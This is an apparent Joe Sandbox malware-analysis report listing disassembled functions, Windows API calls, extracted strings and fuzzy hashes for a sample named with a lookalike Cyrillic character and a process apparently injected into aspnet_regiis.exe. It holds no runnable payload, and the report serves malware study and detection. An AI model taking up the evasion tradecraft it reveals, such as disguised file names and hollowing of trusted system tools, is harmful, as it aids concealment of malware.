___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDD2BC3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDD2BDC
SetLastError.KERNEL32(00000000,6CDD15F1,?,00000001,?,?,00000001,?,6CDE1120,0000000C,6CDD16EA,?,00000001,?), ref: 6CDD2C2E

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 43da39421beed785398b8b8a7970d5cffa8757832e1ab9ea669d7969d862f77c
Instruction ID: 76bb2b8d5af2f1708a637364b1ee73613b08efd1ac70ce070739f0725da61c09
Opcode Fuzzy Hash: 43da39421beed785398b8b8a7970d5cffa8757832e1ab9ea669d7969d862f77c
Instruction Fuzzy Hash: ED01F533E097229EAA1527B97C8895736B4DB0A37D7260329E52082AF4EF56BC045390

Function 6CDD509F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\S#U043eftWare.exe, xrefs: 6CDD50A4

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\S#U043eftWare.exe
API String ID: 0-2954152740
Opcode ID: c49473e44d384b75473d7dfdf7b973f7917797b2a16eb59bbfac9ad9edbd61f5
Instruction ID: 1a709b6029802edf2a92c3e6399d7e3a1b98cbd51f8cb6e9deefffb55a0312c6
Opcode Fuzzy Hash: c49473e44d384b75473d7dfdf7b973f7917797b2a16eb59bbfac9ad9edbd61f5
Instruction Fuzzy Hash: 05215EB1E04205BF9B10AF658C80D9B77ADEF0536D71A8616F52596A60F731FC148BB0

Function 6CDD2D23 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6CDD2DE4,00000000,?,00000001,00000000,?,6CDD2E5B,00000001,FlsFree,6CDDCD3C,FlsFree,00000000), ref: 6CDD2DB3

Strings

api-ms-, xrefs: 6CDD2D73

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: eb866a30a526b997ff0677f020197792a052c3e7bd82a531d43784363cb041e9
Instruction ID: e8efdfc7d070c1420b0129867963b75193fe4dbf32711c6fc8a3f7670526d677
Opcode Fuzzy Hash: eb866a30a526b997ff0677f020197792a052c3e7bd82a531d43784363cb041e9
Instruction Fuzzy Hash: 3C11A331E45621EBEB229F688C48B4933B8AF42768F270210FA10EB694D770FD0087E0

Function 6CDD33DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CDD338F,?,?,6CDD3357,?,00000001,?), ref: 6CDD33F2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDD3405
FreeLibrary.KERNEL32(00000000,?,?,6CDD338F,?,?,6CDD3357,?,00000001,?), ref: 6CDD3428

Strings

mscoree.dll, xrefs: 6CDD33EB
CorExitProcess, xrefs: 6CDD33FD

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9b3d0f8f899cdfa8c3da466f4411853884aa390d1d366f5627d476bb232ec338
Instruction ID: daa45f244b5330766c611af8b63023142f4237df625df41f706fd7e39b2846d9
Opcode Fuzzy Hash: 9b3d0f8f899cdfa8c3da466f4411853884aa390d1d366f5627d476bb232ec338
Instruction Fuzzy Hash: A0F01235E01519FBEF02AB51CD09B9E7B7DEB8175AF214064E501A3560CB34EE04DB90

Function 6CDD79F7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CDD7A7B
__alloca_probe_16.LIBCMT ref: 6CDD7B41
__freea.LIBCMT ref: 6CDD7BAD

Part of subcall function 6CDD6BAE: HeapAlloc.KERNEL32(00000000,6CDD68E5,6CDD68E5,?,6CDD55E3,00000220,?,6CDD68E5,?,?,?,?,6CDD8A01,00000001,?,?), ref: 6CDD6BE0

__freea.LIBCMT ref: 6CDD7BB6
__freea.LIBCMT ref: 6CDD7BD9

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 74a66dea30ee76c1710a41073123ef529aa019b809f2d7b83d6ee95e6e8b457a
Instruction ID: f6eeb079694653744f6a6071677a18403229135141eda901a1d715d9ea071de3
Opcode Fuzzy Hash: 74a66dea30ee76c1710a41073123ef529aa019b809f2d7b83d6ee95e6e8b457a
Instruction Fuzzy Hash: 25519072D01216BBEB208F64CC80EBB36A9EF85758F270199FD1497A64E774FD1187A0

Function 6CDD8F45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6CDD8F5D

Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B

_free.LIBCMT ref: 6CDD8F6F
_free.LIBCMT ref: 6CDD8F81
_free.LIBCMT ref: 6CDD8F93
_free.LIBCMT ref: 6CDD8FA5

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dbacf9e9063e7b8cb696e162a0ac995eb619777845b30cb78a815c475f275a6e
Instruction ID: 3d2cf85b630d662edb4f7820b33d0522d264e04407b7ab39e6dea751fb59ef0b
Opcode Fuzzy Hash: dbacf9e9063e7b8cb696e162a0ac995eb619777845b30cb78a815c475f275a6e
Instruction Fuzzy Hash: 0CF06271E056549BDA11DBB4E889D5A73FAAB047647721806F064D7F24C734F8C08BE4

Function 6CDD4937 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CDD4F59: _free.LIBCMT ref: 6CDD4F67

Part of subcall function 6CDD5B2D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CDD7BA3,?,00000000,00000000), ref: 6CDD5BD9

GetLastError.KERNEL32 ref: 6CDD499F
__dosmaperr.LIBCMT ref: 6CDD49A6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CDD49E5
__dosmaperr.LIBCMT ref: 6CDD49EC

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 1dee3d67bbefa5939555e319271497f60fdcd39a4d768e071c342678b55bab4a
Instruction ID: c9a6d27282eb2405ba1cb79170363b126fe97fdce21c434f66dcf85af717df80
Opcode Fuzzy Hash: 1dee3d67bbefa5939555e319271497f60fdcd39a4d768e071c342678b55bab4a
Instruction Fuzzy Hash: 19217471E04205BF9B109F668CC0D5AB7ACEF0536D7168658F968A7A60E731FC408BA4

Function 6CDD4237 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6CDD8547,?,00000001,6CDD6956,?,6CDD8A01,00000001,?,?,?,6CDD68E5,?,00000000), ref: 6CDD423C
_free.LIBCMT ref: 6CDD4299
_free.LIBCMT ref: 6CDD42CF
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CDD8A01,00000001,?,?,?,6CDD68E5,?,00000000,00000000,6CDE1360,0000002C,6CDD6956), ref: 6CDD42DA

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3fef40d15c97e29d4acd9ab4116f5cc166ff817da17728d2ae5894adcb985830
Instruction ID: 4076cff84704cef2b7037e1b98183cd9861a7e543db049c00de8346c7030b08e
Opcode Fuzzy Hash: 3fef40d15c97e29d4acd9ab4116f5cc166ff817da17728d2ae5894adcb985830
Instruction Fuzzy Hash: EB11A771F056106B9A0127B54C84E673AB9DBC237D72B0634F66597EB0EF24E8084361

Function 6CDD438E Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,6CDD47C8,6CDD4859,?,?,6CDD3A6F), ref: 6CDD4393
_free.LIBCMT ref: 6CDD43F0
_free.LIBCMT ref: 6CDD4426
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CDD47C8,6CDD4859,?,?,6CDD3A6F), ref: 6CDD4431

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3b3e10a94f68715d7796ccef4e82bf65a5bb57ad2c087d4d1803ec661cb39e18
Instruction ID: ec08aabca8fa413696bfa5f9da4c4d1cbe9c01370b538a4f2a96ecfd1803c43b
Opcode Fuzzy Hash: 3b3e10a94f68715d7796ccef4e82bf65a5bb57ad2c087d4d1803ec661cb39e18
Instruction Fuzzy Hash: 5011C671F446106B9A0427BD9C84F6636F9DBC237D72B0638F56487AF0EF64AC094361

Function 6CDD9796 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001), ref: 6CDD97AD
GetLastError.KERNEL32(?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001,?,00000001,?,6CDD8A22,6CDD68E5), ref: 6CDD97B9

Part of subcall function 6CDD977F: CloseHandle.KERNEL32(FFFFFFFE,6CDD97C9,?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001,?,00000001), ref: 6CDD978F

___initconout.LIBCMT ref: 6CDD97C9

Part of subcall function 6CDD9741: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDD9770,6CDD91DD,00000001,?,6CDD84D6,?,?,00000001,?), ref: 6CDD9754

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CDD91F0,?,00000001,?,00000001,?,6CDD84D6,?,?,00000001,?), ref: 6CDD97DE

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3616d820e4f4d722ad1100a61a6ff2fa0987924d3975bc3bc142e952b0057021
Instruction ID: 9b66df5ba2aead43be2d40465645810d11b7d0c66af319b95e93ff73216a2f80
Opcode Fuzzy Hash: 3616d820e4f4d722ad1100a61a6ff2fa0987924d3975bc3bc142e952b0057021
Instruction Fuzzy Hash: E4F0AC36A44125BBCF123FD6DC18E997F7AFB497A5F064110FB1995520CA72A820EB90

Function 6CDD3B67 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6CDD3B70

Part of subcall function 6CDD4833: HeapFree.KERNEL32(00000000,00000000,?,6CDD3A6F), ref: 6CDD4849
Part of subcall function 6CDD4833: GetLastError.KERNEL32(?,?,6CDD3A6F), ref: 6CDD485B

_free.LIBCMT ref: 6CDD3B83
_free.LIBCMT ref: 6CDD3B94
_free.LIBCMT ref: 6CDD3BA5

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 38becc88903b89fb2c1d11af7dc807fca4bc8c844c83784317697ee9c17d15e5
Instruction ID: a1ebf252de468529f7b3e264a14233b88a122b1916663c2b851eebc18966bfbd
Opcode Fuzzy Hash: 38becc88903b89fb2c1d11af7dc807fca4bc8c844c83784317697ee9c17d15e5
Instruction Fuzzy Hash: FBE0E6B1E203709ACE115F99E814A857F71EB5A7543024016E44492B34CF7D1596DFA5

Function 6CDD346B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\S#U043eftWare.exe, xrefs: 6CDD34AE, 6CDD34B5, 6CDD34EB

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\S#U043eftWare.exe
API String ID: 0-2954152740
Opcode ID: 9d2ef95ee2aac55d73a1df15b9eea64bfcae9d8b868a97553c339bfcf4715d37
Instruction ID: 85c9e0b297db57006eb6426b15df74953923ebbcb98e50f126b6e33c035575fd
Opcode Fuzzy Hash: 9d2ef95ee2aac55d73a1df15b9eea64bfcae9d8b868a97553c339bfcf4715d37
Instruction Fuzzy Hash: 64419571E14214EFDB11DF99CC80EAEBBF8EB89714F16006AE405D7760E774AA45CBA0

Function 6CDD55A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 6CDD5350: GetOEMCP.KERNEL32(00000000,6CDD55C1,?,00000001,6CDD8A01,6CDD8A01,00000001,?,?), ref: 6CDD537B

_free.LIBCMT ref: 6CDD561E

Strings

`l, xrefs: 6CDD5646

Memory Dump Source

Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd

Similarity

API ID: _free
String ID: `l
API String ID: 269201875-379310572
Opcode ID: 3a53755c3c082ceffa4bea67802ed97fd426ba4bab06cfd3717f81ca9fc20e95
Instruction ID: 1ebd605f329a8d9481aed2c7ef8f57829c57d29b06d67b1b58ee0b3c9dfb1d1b
Opcode Fuzzy Hash: 3a53755c3c082ceffa4bea67802ed97fd426ba4bab06cfd3717f81ca9fc20e95
Instruction Fuzzy Hash: F7319EB2D00249AFCB01DFA9C840ADE77B5EF45318F16056AF9119B6A0FB31A955CFA0

Function 005372C0 Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

tu, xrefs: 005373CD
%y({, xrefs: 005373C3
1i9k, xrefs: 0053739B
1m1o, xrefs: 00537391

Memory Dump Source

Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd

Similarity

API ID:
String ID: %y({$1i9k$1m1o$tu
API String ID: 0-47764051
Opcode ID: 6eacc2c23ea1e03beb1bb850e62ec4f2c02577823979bf7666b55ff15a0e00e9
Instruction ID: b4783d29fbd02895d49f6e7c59753c85ef052303dd558781346f62f02471f553
Opcode Fuzzy Hash: 6eacc2c23ea1e03beb1bb850e62ec4f2c02577823979bf7666b55ff15a0e00e9
Instruction Fuzzy Hash: 084192B8D00258ABEB20EFB9DE467DD7E74BB81300F504299E4986B289D6750589CFD3

Analysis Process: aspnet_regiis.exePID: 7700, Parent PID: 7624COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.4%
Total number of Nodes:	493
Total number of Limit Nodes:	32

Executed Functions

Function 009689D0 Relevance: 40.7, APIs: 11, Strings: 12, Instructions: 484
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00973678,00000000,00000001,00973668,00000000), ref: 00968B0C
SysAllocString.OLEAUT32(79CB7BB2), ref: 00968BA3
CoSetProxyBlanket.COMBASE(00006F68,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00968BE1
SysAllocString.OLEAUT32(79CB7BB2), ref: 00968C50
SysAllocString.OLEAUT32(79CB7BB2), ref: 00968D15
VariantInit.OLEAUT32(?), ref: 00968D80
VariantClear.OLEAUT32(?), ref: 00968F04
SysFreeString.OLEAUT32(?), ref: 00968F2F
SysFreeString.OLEAUT32(?), ref: 00968F35
SysFreeString.OLEAUT32(00000000), ref: 00968F46

Strings

tw, xrefs: 00968CBA
tW(Q, xrefs: 00968C7A
q]j], xrefs: 00968D0D
x[, xrefs: 00968C72
C, xrefs: 00968ABB
\, xrefs: 00968AC6
9]j], xrefs: 00968CD0
T#]], xrefs: 00968C62
;OnI, xrefs: 00968C8A
"S#M, xrefs: 00968C82
!_2Y, xrefs: 00968C6A
I'Y!, xrefs: 00968C5A

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: !_2Y$"S#M$9]j]$;OnI$C$I'Y!$T#]]$\$q]j]$tW(Q$tw$x[
API String ID: 2485776651-621965088
Opcode ID: 85eeae270b505bd1e63c061715c95d1d44c35a4ddc93442be1265c6026ef1940
Instruction ID: 3f090b4a402fdf0df92aa25e2bb6800b90765d11932eeccf3a19eb4646e38752
Opcode Fuzzy Hash: 85eeae270b505bd1e63c061715c95d1d44c35a4ddc93442be1265c6026ef1940
Instruction Fuzzy Hash: B5F1ED726083019FD320DF65C885B5BBBE9EFC4714F148A2CF5959B290DB75D906CB82

Function 00948BE3 Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 822
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

z, xrefs: 009493D6
7654, xrefs: 00948F11
0, xrefs: 009492AA
^, xrefs: 00948FCB
??;4, xrefs: 00948FB6

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 0$7654$??;4$^$z
API String ID: 0-2567570624
Opcode ID: d964275af12f0bd879cb3fdff101d30d8cd372dba2673852a5692c08d3ffdc43
Instruction ID: 4e2a5882f942daa3b998b6c7f6a93c35ecd7a8a1fec18bc1a214588be5a206d0
Opcode Fuzzy Hash: d964275af12f0bd879cb3fdff101d30d8cd372dba2673852a5692c08d3ffdc43
Instruction Fuzzy Hash: 4B4204B6A183418BD724CF24D891BAFB7E6FFC9304F08492DE48987392E7359915CB52

Function 0093E2B2 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0093E2C7

Strings

lhrZ, xrefs: 0093E3EC
(/"), xrefs: 0093E3E1
inzB, xrefs: 0093E425
ET, xrefs: 0093E53D
<W, xrefs: 0093E553
whv`, xrefs: 0093E3B5

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: (/")$<W$ET$inzB$lhrZ$whv`
API String ID: 3861434553-2446375791
Opcode ID: 55b7f771962393f72b102a76498816e7c969575340022cb6e5d78c4cf2f39161
Instruction ID: 1b1cc3ffb83dce28ce942ec8d1930597c0e6c975c0aa3592929cd2da5089052c
Opcode Fuzzy Hash: 55b7f771962393f72b102a76498816e7c969575340022cb6e5d78c4cf2f39161
Instruction Fuzzy Hash: 99A1EDB060C3D28BD3358F2594917EBBFE1ABA6308F18896CD4D95B286D7780546CF92

Function 00938AE0 Relevance: 7.7, APIs: 5, Instructions: 198
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00938B02
GetCurrentThreadId.KERNEL32 ref: 00938B15
GetCurrentProcessId.KERNEL32 ref: 00938B1D
GetForegroundWindow.USER32 ref: 00938C6E
ExitProcess.KERNEL32 ref: 00938D36

Memory Dump Source

Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
